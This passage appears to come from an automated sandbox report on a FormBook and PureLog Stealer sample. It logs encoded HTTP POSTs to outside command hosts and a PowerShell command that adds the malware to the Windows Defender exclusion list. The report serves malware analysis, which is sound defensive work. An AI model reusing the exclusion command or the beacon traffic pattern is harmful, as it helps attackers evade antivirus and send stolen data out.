                                                                                                                          Data Raw: 56 30 3d 35 4f 67 61 39 45 7a 6a 68 45 52 73 31 6d 6e 6f 65 50 2f 61 6a 32 71 74 73 4b 34 4c 4e 54 64 72 44 31 4e 74 63 46 39 31 68 42 78 4c 49 32 64 41 69 73 6a 75 56 4d 7a 43 55 5a 47 44 6d 57 31 71 52 44 56 58 64 63 6f 32 58 4f 50 59 63 4c 4b 35 79 31 48 31 79 66 59 69 38 6d 39 30 42 41 45 66 59 4b 57 6a 4a 50 6b 38 78 41 30 75 6e 61 39 59 38 55 4b 77 6f 5a 52 73 4c 63 58 58 39 36 49 63 39 54 4a 6a 6c 4e 34 30 6b 4f 62 65 70 36 45 6d 74 74 52 7a 50 2b 4e 36 34 5a 56 62 59 72 72 6c 4f 4e 41 68 74 4b 36 72 4c 34 76 31 41 44 32 75 51 48 46 75 43 52 33 69 66 71 58 4f 6f 51 6a 73 42 67 57 78 37 6c 57 34 42 41 31 53 72 70 4d 6c 6e 58 73 34 42 45 49 6c 69 6a 34 39 45 70 67 5a 65 37 64 34 37 31 33 45 63 46 67 42 43 66 34 36 78 43 55 54 69 69 4f 43 71 56 78 34 4b 4e 48 6a 35 38 2b 55 33 57 6e 73 53 66 70 54 41 2b 57 30 2b 73 4d 77 68 30 58 38 73 56 43 34 46 49 2f 39 72 52 51 46 48 54 51 79 4c 58 2b 54 70 41 5a 78 76 30 75 4e 61 38 4a 4b 79 52 4b 4e 59 41 4b 41 6b 74 44 54 56 7a 2b 6f 55 61 53 65 75 37 4e [TRUNCATED]
                                                                                                                          Data Ascii: V0=5Oga9EzjhERs1mnoeP/aj2qtsK4LNTdrD1NtcF91hBxLI2dAisjuVMzCUZGDmW1qRDVXdco2XOPYcLK5y1H1yfYi8m90BAEfYKWjJPk8xA0una9Y8UKwoZRsLcXX96Ic9TJjlN40kObep6EmttRzP+N64ZVbYrrlONAhtK6rL4v1AD2uQHFuCR3ifqXOoQjsBgWx7lW4BA1SrpMlnXs4BEIlij49EpgZe7d4713EcFgBCf46xCUTiiOCqVx4KNHj58+U3WnsSfpTA+W0+sMwh0X8sVC4FI/9rRQFHTQyLX+TpAZxv0uNa8JKyRKNYAKAktDTVz+oUaSeu7NFY92ngp8Czvqrbgay+3UASNjQaQuvPx1c4Y0c78wkxerEUckkU/dgnTWyllldjxXNcmA9IM8faVoi+btXeEU5dGHBRHDsfQFvbut77QZe05JMZugnlyx1i0/3zrGWMy/T4j8ZcHV2wuCVWG1dfeKtFaZI+6gEzk5luEYnpUbSRSx0zrJryjtlP3qoyFZdxK9nehE8+zvW0Mgz816m4rTjsRDkji+IH/PZ3iFqn0JqJHOCk1eBNRYujU2toxfL4Gl37AtP6PJJDe1Bk2DGtcdzyuachhcdWGAHt2sWkx15gj1jqTc65qAyMw5n/B7+LodDM++6DFeejutcu5R/CPwaNBtJBu16l2Sj24Lq3S8mILNQ7mrIFDsUVSRrnm/Rq1BkN0HcZCVfl4w508Go7xPg0/vM2OgZ31O2CniWaigCcZuEah2FpVfrPlU83e+rtCdrokq1gMoEsNCToY8jMO0lzpb8ljT6m4mAEHsUJfxjZHxzifPCqzhOWVhWUpYiT430mwLG5zlxo6wlqbCslHdAmANwcImc1dvSSIaz/4sO3i57S/tWg7sLnQU3bqkwtu+BHiiF63aHlAGEm8LeXUFvILvZ6f6l67z2sy8g3bPfQ0c9x10EYVaFsPa65gVEfcRA0p0j8EZtMaG7KwrMjl7Z2GCq8rQFg8ECC [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:17:48.103812933 CET309INHTTP/1.1 405 Not Allowed
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:48 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 157
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.450031213.171.195.105804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:50.053545952 CET391OUTGET /he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:17:50.653280020 CET1236INHTTP/1.1 200 OK
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:50 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 2862
                                                                                                                          last-modified: Wed, 27 Nov 2024 10:28:56 GMT
                                                                                                                          etag: "6746f468-b2e"
                                                                                                                          accept-ranges: bytes
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 63 73 73 2f 69 6e 64 65 78 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 66 61 73 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain
                                                                                                                          Jan 15, 2025 18:17:50.653325081 CET224INData Raw: 56 61 72 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 70 61 72 6b 65 64 20 66 6f 72 20 46 52 45 45 20 62 79 0a 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: Var"></span></h2> <p> This domain name is parked for FREE by <strong><a href="https://fasthosts.co.uk/" rel="nofollow">fasthosts.co.uk</a></strong> </p> <div class="row"> <div class
                                                                                                                          Jan 15, 2025 18:17:50.653352976 CET1236INData Raw: 3d 22 63 61 72 64 20 63 61 72 64 2d 2d 69 73 2d 63 74 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 79 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74
                                                                                                                          Data Ascii: ="card card--is-cta"> <h3> Looking to buy a similar domain to <br> <strong><span class="domainVar"></span>?</strong> </h3> <a class="cta cta--primary" rel="nofollow" id="domainSearchCta">St
                                                                                                                          Jan 15, 2025 18:17:50.653384924 CET224INData Raw: 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 2e 22 2c 20 22 22 29 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79
                                                                                                                          Data Ascii: tion.hostname || document.location.hostname.replace("www.", "") document.querySelectorAll(".domainVar").forEach(placeholder => placeholder.innerText = cleanHostname) document.getElementById("domainSearchCta").href =
                                                                                                                          Jan 15, 2025 18:17:50.653465986 CET176INData Raw: 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 64 6f 6d 61 69 6e 2d 6e 61 6d 65 73 2f 73 65 61 72 63 68 2f 3f 64 6f 6d 61 69 6e 3d 24 7b 63 6c 65 61 6e 48 6f 73 74 6e 61 6d 65 7d 26 75 74 6d 5f 73 6f 75 72
                                                                                                                          Data Ascii: `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.45003285.159.66.93804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:55.807677984 CET669OUTPOST /coi2/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.letsbookcruise.xyz
                                                                                                                          Origin: http://www.letsbookcruise.xyz
                                                                                                                          Referer: http://www.letsbookcruise.xyz/coi2/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 77 63 4d 30 5a 70 4f 55 69 5a 66 49 71 54 51 32 4b 6e 55 6e 51 6c 55 69 52 33 41 46 6a 51 38 2f 59 32 76 63 33 48 66 68 4a 42 31 46 4c 47 6b 56 4b 76 66 33 36 62 46 51 6e 4f 79 33 56 64 6a 65 4e 43 57 4e 61 49 32 73 30 50 50 72 5a 30 52 74 6c 7a 72 75 47 35 62 47 38 6d 43 52 51 78 59 70 42 6d 4b 71 4e 32 66 71 64 42 47 65 4f 4f 56 68 39 72 51 73 53 58 64 4b 47 72 6d 47 46 7a 57 70 71 71 38 74 6e 74 69 67 61 45 65 47 78 2b 46 41 59 6d 4f 5a 45 71 76 79 6c 42 51 4c 51 53 7a 46 4b 42 46 44 7a 71 37 48 67 62 66 71 6e 48 56 41 54 65 2b 6b 4e 64 2f 6f 53 68 6f 57 70 70 4a 65 70 77 3d 3d
                                                                                                                          Data Ascii: V0=wcM0ZpOUiZfIqTQ2KnUnQlUiR3AFjQ8/Y2vc3HfhJB1FLGkVKvf36bFQnOy3VdjeNCWNaI2s0PPrZ0RtlzruG5bG8mCRQxYpBmKqN2fqdBGeOOVh9rQsSXdKGrmGFzWpqq8tntigaEeGx+FAYmOZEqvylBQLQSzFKBFDzq7HgbfqnHVATe+kNd/oShoWppJepw==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.45003385.159.66.93804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:17:58.362605095 CET689OUTPOST /coi2/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.letsbookcruise.xyz
                                                                                                                          Origin: http://www.letsbookcruise.xyz
                                                                                                                          Referer: http://www.letsbookcruise.xyz/coi2/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 77 63 4d 30 5a 70 4f 55 69 5a 66 49 70 7a 41 32 50 41 49 6e 42 56 55 74 50 48 41 46 6f 77 39 34 59 32 7a 63 33 47 62 78 4a 79 52 46 49 6a 59 56 4c 75 66 33 35 62 46 51 6f 75 79 79 49 4e 6a 72 4e 43 71 76 61 4b 69 73 30 4f 76 72 5a 78 74 74 6c 67 7a 68 46 4a 62 59 30 47 43 58 64 52 59 70 42 6d 4b 71 4e 79 50 55 64 42 65 65 4f 2b 6c 68 76 36 51 6a 62 33 64 4a 50 4c 6d 47 42 7a 58 69 71 71 38 66 6e 75 6d 4b 61 42 61 47 78 38 64 41 57 54 79 57 64 36 76 77 6f 68 51 59 51 67 75 67 4d 78 59 5a 78 61 6e 59 76 65 37 70 6d 42 59 61 43 76 66 7a 66 64 62 62 50 6d 68 69 6b 71 30 58 79 35 55 54 6f 6c 43 65 61 65 44 67 7a 79 49 61 6c 44 66 71 33 77 45 3d
                                                                                                                          Data Ascii: V0=wcM0ZpOUiZfIpzA2PAInBVUtPHAFow94Y2zc3GbxJyRFIjYVLuf35bFQouyyINjrNCqvaKis0OvrZxttlgzhFJbY0GCXdRYpBmKqNyPUdBeeO+lhv6Qjb3dJPLmGBzXiqq8fnumKaBaGx8dAWTyWd6vwohQYQgugMxYZxanYve7pmBYaCvfzfdbbPmhikq0Xy5UTolCeaeDgzyIalDfq3wE=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.45003485.159.66.93804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:18:01.080929995 CET10771OUTPOST /coi2/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.letsbookcruise.xyz
                                                                                                                          Origin: http://www.letsbookcruise.xyz
                                                                                                                          Referer: http://www.letsbookcruise.xyz/coi2/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 77 63 4d 30 5a 70 4f 55 69 5a 66 49 70 7a 41 32 50 41 49 6e 42 56 55 74 50 48 41 46 6f 77 39 34 59 32 7a 63 33 47 62 78 4a 79 5a 46 4c 57 55 56 4b 4e 48 33 34 62 46 51 68 4f 79 7a 49 4e 6a 4d 4e 43 79 72 61 4b 2f 58 30 4b 66 72 5a 54 56 74 30 42 7a 68 53 5a 62 59 32 47 43 57 51 78 5a 72 42 6d 61 32 4e 32 54 55 64 42 65 65 4f 38 74 68 2f 62 51 6a 64 33 64 4b 47 72 6d 43 46 7a 58 4b 71 71 6c 6f 6e 74 4b 77 64 31 75 47 78 63 4e 41 55 68 61 57 43 71 76 32 72 68 52 46 51 67 69 7a 4d 78 30 64 78 5a 37 2b 76 59 48 70 6e 67 35 57 48 4e 4c 74 4c 36 6a 43 51 30 35 31 6c 36 67 4a 39 70 77 54 6f 33 2b 66 47 4b 44 6f 78 77 5a 7a 79 7a 37 5a 74 33 62 51 73 59 2b 71 66 47 41 72 38 50 63 41 41 66 49 47 35 62 2f 53 65 75 45 53 52 6a 36 6e 76 72 50 59 77 6c 70 69 50 35 37 7a 4b 36 33 58 6c 33 6a 36 53 57 75 72 68 78 61 6c 6d 43 69 6b 2f 54 2b 41 69 44 53 51 35 76 39 78 42 71 43 56 2f 63 61 36 70 5a 74 68 64 65 4b 68 58 59 67 7a 37 45 6c 4d 58 6f 39 68 4e 78 6d 57 39 45 33 43 50 68 61 33 63 4c 4a 4f 6d 68 63 [TRUNCATED]
                                                                                                                          Data Ascii: V0=wcM0ZpOUiZfIpzA2PAInBVUtPHAFow94Y2zc3GbxJyZFLWUVKNH34bFQhOyzINjMNCyraK/X0KfrZTVt0BzhSZbY2GCWQxZrBma2N2TUdBeeO8th/bQjd3dKGrmCFzXKqqlontKwd1uGxcNAUhaWCqv2rhRFQgizMx0dxZ7+vYHpng5WHNLtL6jCQ051l6gJ9pwTo3+fGKDoxwZzyz7Zt3bQsY+qfGAr8PcAAfIG5b/SeuESRj6nvrPYwlpiP57zK63Xl3j6SWurhxalmCik/T+AiDSQ5v9xBqCV/ca6pZthdeKhXYgz7ElMXo9hNxmW9E3CPha3cLJOmhcKMUJ9oz7mSKBsgGekAqpLDGdG1hSlf68LloR6mcGH3feR4pI958GA2wtoyq4GvkEF8t19DZt7jbMB3fSu+4NpSag5/HZP3Dix3fFpncMs3NateIna/Y5h/weGecGQWpj3fAZQ8lYSm0rgGDuEAhE5hkuy3E4+m9BCDyznUSHhZcWgePd8JDBYceftnxOyZHOwd/E8fXro4qFIdNWBpZkMuYEF/d5Pk+JTGeUD1A8uS+pCftgVXyCsaQn8PUk1ZrBuBZT1NSEDG0HgirQnPXtXWVWiCyCFob/WjJhKVHeskNNF7DsEMFmTEwJ0WwCnLEIHYiDGkF4QF/FE7Niy28cFRn6rKsfbNnF/JnwnNMOrjQE/JQGYM2yoKS23PoL06kdnJBvAKujtHmcPW6/WYThnodlahHOPqsR0WXfX+/jRwgtBh0gn2oNWe+7pxQtLANTnYe8Q++bXaUw5Hjy4OrQRnHIPHk1KY01PDjI2SyoXIsgBN29bT07wWfYtOKd/0hP2Yc9IMqQbXndr09cT7osHCKhPF7WP9xNgMZ/XIkaY/QObeJEHSoT8vi7xN7m5tXJWo58qHkl4KgAtJx6eoQD/FuBaRaGwPxiAAiEpFqbImoRZFg25OdMqsLaX7MehNL/HZgt4KU0InVqUMvo1j4epFpH7z3X0g4vtN [TRUNCATED]


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:12:14:55
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\PO -2025918.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\PO -2025918.exe"
                                                                                                                          Imagebase:0x390000
                                                                                                                          File size:782'336 bytes
                                                                                                                          MD5 hash:CB01D48BAF8A685F7F8233565E3CBFB7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:12:15:12
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
                                                                                                                          Imagebase:0xc80000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:12:15:12
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\PO -2025918.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\PO -2025918.exe"
                                                                                                                          Imagebase:0xfa0000
                                                                                                                          File size:782'336 bytes
                                                                                                                          MD5 hash:CB01D48BAF8A685F7F8233565E3CBFB7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:12:15:12
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:12:15:31
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe"
                                                                                                                          Imagebase:0x800000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:12:15:32
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                                                                                          Imagebase:0xcf0000
                                                                                                                          File size:19'456 bytes
                                                                                                                          MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:12:15:45
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe"
                                                                                                                          Imagebase:0x800000
                                                                                                                          File size:140'800 bytes
                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:12:15:57
                                                                                                                          Start date:15/01/2025
                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                          Imagebase:0x7ff6bf500000
                                                                                                                          File size:676'768 bytes
                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:5.5%
                                                                                                                            Total number of Nodes:55
                                                                                                                            Total number of Limit Nodes:6
